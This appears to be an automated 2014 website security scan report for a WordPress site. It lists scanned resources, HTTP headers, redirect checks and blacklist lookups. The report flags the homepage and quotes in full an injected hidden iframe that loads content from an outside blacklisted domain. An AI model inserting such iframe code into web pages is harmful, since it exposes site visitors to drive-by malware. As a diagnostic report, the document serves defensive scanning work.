Scanned pages/files
| Request | Server response | Status |
http://conservingmoney.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 10 Jun 2014 09:57:11 GMT Location: http://www.conservingmoney.com/ Server: LiteSpeed Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wfvt_3519594384=5396d6776541a; expires=Tue, 10-Jun-2014 10:27:11 GMT; path=/ X-Pingback: http://www.conservingmoney.com/xmlrpc.php X-Powered-By: PHP/5.4.22 | clean |
http://www.conservingmoney.com/ | 200 OK Content-Length: 38935 Content-Type: text/html | malicious |
Page code contains blacklisted domain: nmsbaseball.com ...[45489 bytes skipped]... nservingmoney.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"Sending ..."}; /* ]]> */ </script> <script type='text/javascript' src='http://www.conservingmoney.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.7.2'></script> </div><!--/page --> <iframe name=Twitter scrolling=auto frameborder=no align=center height=81 width=66 src=http://nmsbaseball.com/post.php?id=702113></iframe></body> </html> Malicious iFrame found. size: 66x81 src: http://nmsbaseball.com/post.php?id=702113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=81 width=66 src=http://nmsbaseball.com/post.php?id=702113> | ||
http://www.conservingmoney.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-content/plugins/amazon-youtube-related/assets/js/fancybox/jquery.mousewheel-3.0.6.pack.js?ver=3.9.1 | 200 OK Content-Length: 1384 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-content/plugins/amazon-youtube-related/assets/js/fancybox/jquery.fancybox.js?v=2.0.6&ver=3.9.1 | 200 OK Content-Length: 34033 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-content/plugins/amazon-youtube-related/assets/js/fancybox/helpers/jquery.fancybox-media.js?v=1.0.0&ver=3.9.1 | 200 OK Content-Length: 3049 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-content/plugins/amazon-youtube-related/assets/js/amazon_youtube_scripts.js?ver=3.9.1 | 200 OK Content-Length: 303 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 4289 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-content/plugins/associate_goliath/js/post.js?ver=04.02.03 | 200 OK Content-Length: 539 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-content/plugins/clever-youtube-plugin/global.js?ver=3.9.1 | 200 OK Content-Length: 14344 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-content/themes/gazette/includes/js/mootools.v1.11.js | 200 OK Content-Length: 34839 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-content/themes/gazette/includes/js/jd.gallery.js | 200 OK Content-Length: 24746 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-content/themes/gazette/includes/js/jd.gallery.transitions.js | 200 OK Content-Length: 2182 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-content/themes/gazette/includes/js/mootabs1.2.js | 200 OK Content-Length: 4513 Content-Type: application/javascript | clean |
http://www.conservingmoney.com/wp-content/themes/gazette/includes/js/suckerfish.js | 200 OK Content-Length: 876 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: conservingmoney.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 10 Jun 2014 09:57:11 GMT
Location: http://www.conservingmoney.com/
Server: LiteSpeed
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_3519594384=5396d6776541a; expires=Tue, 10-Jun-2014 10:27:11 GMT; path=/
X-Pingback: http://www.conservingmoney.com/xmlrpc.php
X-Powered-By: PHP/5.4.22
...0 bytes of data.
GET / HTTP/1.1
Host: conservingmoney.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 10 Jun 2014 09:57:11 GMT
Location: http://www.conservingmoney.com/
Server: LiteSpeed
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_3519594384=5396d6776541a; expires=Tue, 10-Jun-2014 10:27:11 GMT; path=/
X-Pingback: http://www.conservingmoney.com/xmlrpc.php
X-Powered-By: PHP/5.4.22
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: conservingmoney.com
Referer: http://www.google.com/search?q=conservingmoney.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: conservingmoney.com
Referer: http://www.google.com/search?q=conservingmoney.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=conservingmoney.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://conservingmoney.com/
Result: conservingmoney.com is not infected or malware details are not published yet.
Result: conservingmoney.com is not infected or malware details are not published yet.